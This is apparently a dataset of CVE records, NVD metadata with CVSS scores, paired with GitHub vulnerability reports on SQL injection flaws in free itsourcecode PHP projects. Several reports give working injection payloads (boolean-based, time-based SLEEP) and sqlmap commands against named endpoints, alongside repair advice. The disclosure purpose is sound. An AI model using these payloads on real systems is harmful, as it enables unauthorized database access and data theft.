# Itsourcecode "Billing System " in PHP 1.0 "process.php" SQL injection # NAME OF AFFECTED PRODUCT(S) + Billing System In PHP With Source Code ## Vendor Homepage + https://itsourcecode.com/free-projects/php-project/billing-system-in-php-with-source-code/ # AFFECTED AND/OR FIXED VERSION(S) ## submitter + quchunyi,yaomingjun,luowenwei,zhangxin,chenshan,tianbeibei,fengyilin,maqiutong,fuweidong,lishudong at Guangzhou University ## Vulnerable File + process.php ## VERSION(S) + V1.0 ## Software Link + https://itsourcecode.com/wp-content/uploads/2021/02/Billing-System-In-PHP-Source-Code.zip # PROBLEM TYPE ## Vulnerability Type + SQL injection ## Root Cause + A SQL injection vulnerability was found in the 'process.php' file of the 'Billing System' project. The reason for this issue is that attackers inject malicious code from the parameter "username" and use it directly in SQL queries without the need for appropriate cleaning or validation. This allows attackers to forge input values, thereby manipulating SQL queries and performing unauthorized operations. ## Impact + Attackers can exploit this SQL injection vulnerability to achieve unauthorized database access, sensitive data leakage, data tampering, comprehensive system control, and even service interruption, posing a serious threat to system security and business continuity. # DESCRIPTION + During the security review of the PHP "Billing System", "xxxx" discovered a critical SQL injection vulnerability in the "process.php" file. This vulnerability stems from insufficient user input validation of the "username" parameter, allowing attackers to inject malicious SQL queries. Therefore, attackers can gain unauthorized access to databases, modify or delete data, and access sensitive information. Immediate remedial measures are needed to ensure system security and protect data integrity. # No login or authorization is required to exploit this vulnerability # Vulnerability details and POC ## Vulnerability type: + time-based blind ## Vulnerability location: + 'username' parameter ## Payload: -- arameter: username (POST) Type: boolean-based blind Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment) Payload: username=-6059' OR 7740=7740#&password=1 Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: username=1' AND (SELECT 5285 FROM (SELECT(SLEEP(5)))mRSC)-- VFjk&password=1 --- ![1](https://github.com/ganzhi-qcy/cve/assets/79857790/a4a3a57b-ec32-4415-bef5-09ee7cab7c5b) ## The following are screenshots of some specific information obtained from testing and running with the sqlmap tool: ![2](https://github.com/ganzhi-qcy/cve/assets/79857790/b23ab651-0879-4e27-9842-ca8b517aaf02) ![3](https://github.com/ganzhi-qcy/cve/assets/79857790/8a656154-0e54-418a-a64f-4a804c5f20b8) ![4](https://github.com/ganzhi-qcy/cve/assets/79857790/d0c354a8-db1c-4df1-a62e-67388e6fe710) # Suggested repair 1. **Use prepared statements and parameter binding:** Preparing statements can prevent SQL injection as they separate SQL code from user input data. When using prepare statements, the value entered by the user is treated as pure data and will not be interpreted as SQL code. 2. **Input validation and filtering:** Strictly validate and filter user input data to ensure it conforms to the expected format. 3. **Minimize database user permissions:** Ensure that the account used to connect to the database has the minimum necessary permissions. Avoid using accounts with advanced permissions (such as' root 'or' admin ') for daily operations. 4. **Regular security audits:** Regularly conduct code and system security audits to promptly identify and fix potential security vulnerabilities.
Itsourcecode "Billing System " in PHP 1.0 "process.php" SQL injection
https://api.github.com/repos/ganzhi-qcy/cve/issues/3/comments
0
2024-06-07T12:35:49Z
2024-10-04T07:38:47Z
https://github.com/ganzhi-qcy/cve/issues/3
2,340,350,987
3
6,065
CVE-2024-5981
2024-06-14T02:15:09.897
A vulnerability was found in itsourcecode Online House Rental System 1.0. It has been classified as critical. Affected is an unknown function of the file manage_user.php. The manipulation of the argument id leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-268458 is the identifier assigned to this vulnerability.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "PARTIAL", "baseScore": 6.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 8, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "cna@vuldb.com", "type": "Secondary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "LOW", "baseScore": 6.3, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 3.4, "source": "cna@vuldb.com", "type": "Secondary" }, { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": [ { "cvssData": { "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "Safety": "NOT_DEFINED", "attackComplexity": "LOW", "attackRequirements": "NONE", "attackVector": "NETWORK", "availabilityRequirement": "NOT_DEFINED", "baseScore": 5.3, "baseSeverity": "MEDIUM", "confidentialityRequirement": "NOT_DEFINED", "exploitMaturity": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "privilegesRequired": "LOW", "providerUrgency": "NOT_DEFINED", "subAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "userInteraction": "NONE", "valueDensity": "NOT_DEFINED", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "version": "4.0", "vulnAvailabilityImpact": "LOW", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnerabilityResponseEffort": "NOT_DEFINED" }, "source": "cna@vuldb.com", "type": "Secondary" } ] }
[ { "source": "cna@vuldb.com", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/LiuYongXiang-git/cve/issues/1" }, { "source": "cna@vuldb.com", "tags": [ "Permissions Required", "VDB Entry" ], "url": "https://vuldb.com/?ctiid.268458" }, { "source": "cna@vuldb.com", "tags": [ "VDB Entry" ], "url": "https://vuldb.com/?id.268458" }, { "source": "cna@vuldb.com", "tags": [ "Third Party Advisory", "VDB Entry" ], "url": "https://vuldb.com/?submit.356163" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/LiuYongXiang-git/cve/issues/1" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Permissions Required", "VDB Entry" ], "url": "https://vuldb.com/?ctiid.268458" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "VDB Entry" ], "url": "https://vuldb.com/?id.268458" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory", "VDB Entry" ], "url": "https://vuldb.com/?submit.356163" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:angeljudesuarez:online_house_rental_system:1.0:*:*:*:*:*:*:*", "matchCriteriaId": "A276F952-0667-44B9-898A-4F0B94154436", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "89" ]
89
https://github.com/LiuYongXiang-git/cve/issues/1
[ "Exploit", "Third Party Advisory" ]
github.com
[ "LiuYongXiang-git", "cve" ]
# Itsourcecode Online House Rental System Project In PHP With Source Code v1.0 manage_user.php SQL injection # NAME OF AFFECTED PRODUCT(S) + Online House Rental System Project In PHP With Source Code ## Vendor Homepage + https://itsourcecode.com/free-projects/php-project/online-house-rental-system-project-in-php-with-source-code/ # AFFECTED AND/OR FIXED VERSION(S) ## submitter + dlss ## Vulnerable File + manage_user.php ## VERSION(S) + V1.0 ## Software Link + https://itsourcecode.com/wp-content/uploads/2021/03/Online-House-Rental-Project-In-PHP-Source-Code.zip # PROBLEM TYPE ## Vulnerability Type + SQL injection ## Root Cause + A SQL injection vulnerability was found in the 'manage_user.php' file of the 'Online House Rental System Project In PHP With Source Code' project. The reason for this issue is that attackers inject malicious code from the parameter "id" and use it directly in SQL queries without appropriate cleaning or validation. This allows attackers to forge input values, thereby manipulating SQL queries and performing unauthorized operations. <img width="881" alt="1" src="https://github.com/LiuYongXiang-git/cve/assets/72649042/96859615-a367-46c4-a7c7-ee0e6942e720"> ## Impact + Attackers can exploit this SQL injection vulnerability to achieve unauthorized database access, sensitive data leakage, data tampering, comprehensive system control, and even service interruption, posing a serious threat to system security and business continuity. # DESCRIPTION + Due to insufficient user input validation for the "id" parameter, a serious SQL injection vulnerability was discovered in the login function of the " Online-Bookstore-Project-In-PHP", allowing attackers to inject malicious SQL queries. Therefore, attackers can gain unauthorized access to the database, modify or delete data, and access sensitive information without logging in. Immediate remedial measures are needed to ensure system security and protect data integrity. # Vulnerability details and POC ## Vulnerability type: + boolean-based blind ## Vulnerability location: + 'id' parameter ## Payload: id=1 AND 7032=7032 <img width="515" alt="2" src="https://github.com/LiuYongXiang-git/cve/assets/72649042/ad1c703c-0acd-4bb8-a1f3-577856105527"> ## The following are screenshots of some specific information obtained from testing and running with the sqlmap tool: ```bash sqlmap -u "http://192.168.1.136:1216/manage_user.php?id=1" --batch --dbs ``` <img width="544" alt="3" src="https://github.com/LiuYongXiang-git/cve/assets/72649042/af360e9d-2d58-425e-8689-6601c359a14e"> # Suggested repair 1. **Use prepared statements and parameter binding:** Preparing statements can prevent SQL injection as they separate SQL code from user input data. When using prepare statements, the value entered by the user is treated as pure data and will not be interpreted as SQL code. 2. **Input validation and filtering:** Strictly validate and filter user input data to ensure it conforms to the expected format. 3. **Minimize database user permissions:** Ensure that the account used to connect to the database has the minimum necessary permissions. Avoid using accounts with advanced permissions (such as' root 'or' admin ') for daily operations. 4. **Regular security audits:** Regularly conduct code and system security audits to promptly identify and fix potential security vulnerabilities.
Itsourcecode Online House Rental System Project In PHP With Source Code v1.0 manage_user.php SQL injection
https://api.github.com/repos/LiuYongXiang-git/cve/issues/1/comments
0
2024-06-13T10:40:51Z
2024-06-13T10:40:51Z
https://github.com/LiuYongXiang-git/cve/issues/1
2,350,806,578
1
6,066
CVE-2024-5983
2024-06-14T02:15:10.173
A vulnerability was found in itsourcecode Online Bookstore 1.0. It has been declared as critical. Affected by this vulnerability is an unknown functionality of the file bookPerPub.php. The manipulation of the argument pubid leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-268459.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "HIGH", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "cna@vuldb.com", "type": "Secondary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "LOW", "baseScore": 7.3, "baseSeverity": "HIGH", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 3.4, "source": "cna@vuldb.com", "type": "Secondary" }, { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": [ { "cvssData": { "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "Safety": "NOT_DEFINED", "attackComplexity": "LOW", "attackRequirements": "NONE", "attackVector": "NETWORK", "availabilityRequirement": "NOT_DEFINED", "baseScore": 6.9, "baseSeverity": "MEDIUM", "confidentialityRequirement": "NOT_DEFINED", "exploitMaturity": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "privilegesRequired": "NONE", "providerUrgency": "NOT_DEFINED", "subAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "userInteraction": "NONE", "valueDensity": "NOT_DEFINED", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "version": "4.0", "vulnAvailabilityImpact": "LOW", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnerabilityResponseEffort": "NOT_DEFINED" }, "source": "cna@vuldb.com", "type": "Secondary" } ] }
[ { "source": "cna@vuldb.com", "tags": [ "Exploit", "Mitigation" ], "url": "https://github.com/LiuYongXiang-git/cve/issues/2" }, { "source": "cna@vuldb.com", "tags": [ "Permissions Required" ], "url": "https://vuldb.com/?ctiid.268459" }, { "source": "cna@vuldb.com", "tags": [ "Third Party Advisory" ], "url": "https://vuldb.com/?id.268459" }, { "source": "cna@vuldb.com", "tags": [ "VDB Entry" ], "url": "https://vuldb.com/?submit.356164" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Mitigation" ], "url": "https://github.com/LiuYongXiang-git/cve/issues/2" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Permissions Required" ], "url": "https://vuldb.com/?ctiid.268459" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://vuldb.com/?id.268459" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "VDB Entry" ], "url": "https://vuldb.com/?submit.356164" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:itsourcecode:online_book_store_project:1.0:*:*:*:*:*:*:*", "matchCriteriaId": "4AD59DD3-AEC8-4FEB-8580-5501B34821AE", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "89" ]
89
https://github.com/LiuYongXiang-git/cve/issues/2
[ "Exploit", "Mitigation" ]
github.com
[ "LiuYongXiang-git", "cve" ]
# Itsourcecode Online-Bookstore-Project-In-PHP-Source-Code v1.0 bookPerPub.php SQL injection # NAME OF AFFECTED PRODUCT(S) + Online-Bookstore-Project-In-PHP-Source-Code ## Vendor Homepage + https://itsourcecode.com/free-projects/php-project/online-book-store-project-in-php-with-source-code/ # AFFECTED AND/OR FIXED VERSION(S) ## submitter + dlss ## Vulnerable File + bookPerPub.php ## VERSION(S) + V1.0 ## Software Link + https://itsourcecode.com/wp-content/uploads/2021/03/Online-Bookstore-Project-In-PHP-Source-Code.zip # PROBLEM TYPE ## Vulnerability Type + SQL injection ## Root Cause + A SQL injection vulnerability was found in the 'bookPerPub.php' file of the 'Online-Bookstore-Project-In-PHP-Source-Code' project. The reason for this issue is that attackers inject malicious code from the parameter "pubid" and use it directly in SQL queries without appropriate cleaning or validation. This allows attackers to forge input values, thereby manipulating SQL queries and performing unauthorized operations. <img width="672" alt="1" src="https://github.com/LiuYongXiang-git/cve/assets/72649042/43f5310e-cecd-4692-9096-cf1f67a5dbc5"> ## Impact + Attackers can exploit this SQL injection vulnerability to achieve unauthorized database access, sensitive data leakage, data tampering, comprehensive system control, and even service interruption, posing a serious threat to system security and business continuity. # DESCRIPTION + Due to insufficient user input validation for the "pubid" parameter, a serious SQL injection vulnerability was discovered in the login function of the "Online-Bookstore-Project-In-PHP-Source-Code", allowing attackers to inject malicious SQL queries. Therefore, attackers can gain unauthorized access to the database, modify or delete data, and access sensitive information without logging in. Immediate remedial measures are needed to ensure system security and protect data integrity. # No login or authorization is required to exploit this vulnerability # Vulnerability details and POC ## Vulnerability type: + time-based blind + boolean-based blind + error-based ## Vulnerability location: + 'pubid' parameter ## Payload: <img width="344" alt="2" src="https://github.com/LiuYongXiang-git/cve/assets/72649042/3f08d1d6-d01b-450b-b5b1-8a24b1b9bf97"> ## The following are screenshots of some specific information obtained from testing and running with the sqlmap tool: ```bash sqlmap -u http://192.168.210.199:1213/bookPerPub.php?pubid=1 --batch --dbs ``` <img width="337" alt="3" src="https://github.com/LiuYongXiang-git/cve/assets/72649042/d7d0811b-5f49-428d-a1a4-da9f74e7d295"> # Suggested repair 1. **Use prepared statements and parameter binding:** Preparing statements can prevent SQL injection as they separate SQL code from user input data. When using prepare statements, the value entered by the user is treated as pure data and will not be interpreted as SQL code. 2. **Input validation and filtering:** Strictly validate and filter user input data to ensure it conforms to the expected format. 3. **Minimize database user permissions:** Ensure that the account used to connect to the database has the minimum necessary permissions. Avoid using accounts with advanced permissions (such as' root 'or' admin ') for daily operations. 4. **Regular security audits:** Regularly conduct code and system security audits to promptly identify and fix potential security vulnerabilities.
Itsourcecode Online-Bookstore-Project-In-PHP-Source-Code v1.0 bookPerPub.php SQL injection
https://api.github.com/repos/LiuYongXiang-git/cve/issues/2/comments
0
2024-06-13T10:44:19Z
2024-06-13T10:50:21Z
https://github.com/LiuYongXiang-git/cve/issues/2
2,350,813,076
2
6,067
CVE-2024-5984
2024-06-14T02:15:10.443
A vulnerability was found in itsourcecode Online Bookstore 1.0. It has been rated as critical. Affected by this issue is some unknown functionality of the file book.php. The manipulation of the argument bookisbn leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-268460.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "HIGH", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "cna@vuldb.com", "type": "Secondary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "LOW", "baseScore": 7.3, "baseSeverity": "HIGH", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 3.4, "source": "cna@vuldb.com", "type": "Secondary" }, { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": [ { "cvssData": { "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "Safety": "NOT_DEFINED", "attackComplexity": "LOW", "attackRequirements": "NONE", "attackVector": "NETWORK", "availabilityRequirement": "NOT_DEFINED", "baseScore": 6.9, "baseSeverity": "MEDIUM", "confidentialityRequirement": "NOT_DEFINED", "exploitMaturity": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "privilegesRequired": "NONE", "providerUrgency": "NOT_DEFINED", "subAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "userInteraction": "NONE", "valueDensity": "NOT_DEFINED", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "version": "4.0", "vulnAvailabilityImpact": "LOW", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnerabilityResponseEffort": "NOT_DEFINED" }, "source": "cna@vuldb.com", "type": "Secondary" } ] }
[ { "source": "cna@vuldb.com", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/LiuYongXiang-git/cve/issues/3" }, { "source": "cna@vuldb.com", "tags": [ "Permissions Required" ], "url": "https://vuldb.com/?ctiid.268460" }, { "source": "cna@vuldb.com", "tags": [ "Third Party Advisory" ], "url": "https://vuldb.com/?id.268460" }, { "source": "cna@vuldb.com", "tags": [ "Third Party Advisory", "VDB Entry" ], "url": "https://vuldb.com/?submit.356177" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/LiuYongXiang-git/cve/issues/3" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Permissions Required" ], "url": "https://vuldb.com/?ctiid.268460" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://vuldb.com/?id.268460" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory", "VDB Entry" ], "url": "https://vuldb.com/?submit.356177" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:itsourcecode:online_book_store_project:1.0:*:*:*:*:*:*:*", "matchCriteriaId": "4AD59DD3-AEC8-4FEB-8580-5501B34821AE", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "89" ]
89
https://github.com/LiuYongXiang-git/cve/issues/3
[ "Exploit", "Third Party Advisory" ]
github.com
[ "LiuYongXiang-git", "cve" ]
# Itsourcecode Online-Bookstore-Project-In-PHP-Source-Code v1.0 book.php SQL injection # NAME OF AFFECTED PRODUCT(S) + Online-Bookstore-Project-In-PHP-Source-Code ## Vendor Homepage + https://itsourcecode.com/free-projects/php-project/online-book-store-project-in-php-with-source-code/ # AFFECTED AND/OR FIXED VERSION(S) ## submitter + dlss ## Vulnerable File + book.php ## VERSION(S) + V1.0 ## Software Link + https://itsourcecode.com/wp-content/uploads/2021/03/Online-Bookstore-Project-In-PHP-Source-Code.zip # PROBLEM TYPE ## Vulnerability Type + SQL injection ## Root Cause + A SQL injection vulnerability was found in the 'book.php' file of the 'Online-Bookstore-Project-In-PHP-Source-Code' project. The reason for this issue is that attackers inject malicious code from the parameter "bookisbn" and use it directly in SQL queries without appropriate cleaning or validation. This allows attackers to forge input values, thereby manipulating SQL queries and performing unauthorized operations. <img width="672" alt="1" src="https://github.com/LiuYongXiang-git/cve/assets/72649042/c2c8d256-5736-41cc-8b22-f4922b213085"> ## Impact + Attackers can exploit this SQL injection vulnerability to achieve unauthorized database access, sensitive data leakage, data tampering, comprehensive system control, and even service interruption, posing a serious threat to system security and business continuity. # DESCRIPTION + Due to insufficient user input validation for the "bookisbn" parameter, a serious SQL injection vulnerability was discovered in the login function of the "Online-Bookstore-Project-In-PHP-Source-Code", allowing attackers to inject malicious SQL queries. Therefore, attackers can gain unauthorized access to the database, modify or delete data, and access sensitive information without logging in. Immediate remedial measures are needed to ensure system security and protect data integrity. # No login or authorization is required to exploit this vulnerability # Vulnerability details and POC ## Vulnerability type: + time-based blind + boolean-based blind + error-based + UNION query ## Vulnerability location: + 'bookisbn' parameter ## Payload: <img width="344" alt="2" src="https://github.com/LiuYongXiang-git/cve/assets/72649042/b882dc18-b0aa-47e7-827c-7d85cd130249"> ## The following are screenshots of some specific information obtained from testing and running with the sqlmap tool: ```bash sqlmap -u http://192.168.210.199:1213/book.php?bookisbn=978-1-1180-2669-4 --batch --dbs ``` <img width="337" alt="3" src="https://github.com/LiuYongXiang-git/cve/assets/72649042/831b8780-3872-4f30-ae46-3ff84eb97ed6"> # Suggested repair 1. **Use prepared statements and parameter binding:** Preparing statements can prevent SQL injection as they separate SQL code from user input data. When using prepare statements, the value entered by the user is treated as pure data and will not be interpreted as SQL code. 2. **Input validation and filtering:** Strictly validate and filter user input data to ensure it conforms to the expected format. 3. **Minimize database user permissions:** Ensure that the account used to connect to the database has the minimum necessary permissions. Avoid using accounts with advanced permissions (such as' root 'or' admin ') for daily operations. 4. **Regular security audits:** Regularly conduct code and system security audits to promptly identify and fix potential security vulnerabilities.
Itsourcecode Online-Bookstore-Project-In-PHP-Source-Code v1.0 book.php SQL injection
https://api.github.com/repos/LiuYongXiang-git/cve/issues/3/comments
0
2024-06-13T10:52:17Z
2024-06-13T10:52:18Z
https://github.com/LiuYongXiang-git/cve/issues/3
2,350,828,578
3
6,068
CVE-2024-5985
2024-06-14T02:15:10.713
A vulnerability classified as critical has been found in SourceCodester Best Online News Portal 1.0. This affects an unknown part of the file /admin/index.php. The manipulation of the argument username leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-268461 was assigned to this vulnerability.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "PARTIAL", "baseScore": 6.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 8, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "cna@vuldb.com", "type": "Secondary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "LOW", "baseScore": 6.3, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 3.4, "source": "cna@vuldb.com", "type": "Secondary" }, { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, 